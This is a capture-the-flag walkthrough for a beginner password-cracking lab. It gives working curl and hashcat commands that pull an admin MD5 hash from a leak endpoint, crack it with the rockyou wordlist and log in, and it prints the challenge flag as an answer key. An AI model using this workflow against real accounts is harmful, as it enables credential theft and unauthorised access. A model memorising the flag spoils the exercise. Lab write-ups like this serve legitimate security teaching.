HACKR.GG
hackr.gg — Vault — Password Cracking Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Vault — Password Cracking

Password Attacks · Password Cracking
Difficulty
Beginner
Vuln class
Password Cracking
Steps
3
// Objective
Crack a password hash from the leaked database using a wordlist attack with hashcat.
// Tools required
hashcatrockyou.txtcurl
// Step-by-step walkthrough
1
Retrieve the leaked hash
Access the /leak endpoint to get the admin's password hash from the "leaked" database dump.
Command / Input
curl http://TARGET/leak
Output
{"username":"admin","hash":"5f4dcc3b5aa765d61d8327deb882cf99"}
This is an MD5 hash — identified by the 32-char hex format.
2
Crack with hashcat
Run hashcat with the rockyou wordlist against the MD5 hash.
Command / Input
hashcat -m 0 5f4dcc3b5aa765d61d8327deb882cf99 /usr/share/wordlists/rockyou.txt
Output
5f4dcc3b5aa765d61d8327deb882cf99:password
"password" — one of the most common passwords in rockyou.
3
Log in and get the flag
Use the cracked password to log in as admin.
Command / Input
curl -X POST http://TARGET/login -d '{"username":"admin","password":"password"}'
Output
{"flag":"HackrGG{v4ult_cr4ck3d_w3ak_p4ss}"}
// Flag
Flag value
HackrGG{v4ult_cr4ck3d_w3ak_p4ss}
Returned on successful admin login after cracking the MD5 hash.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute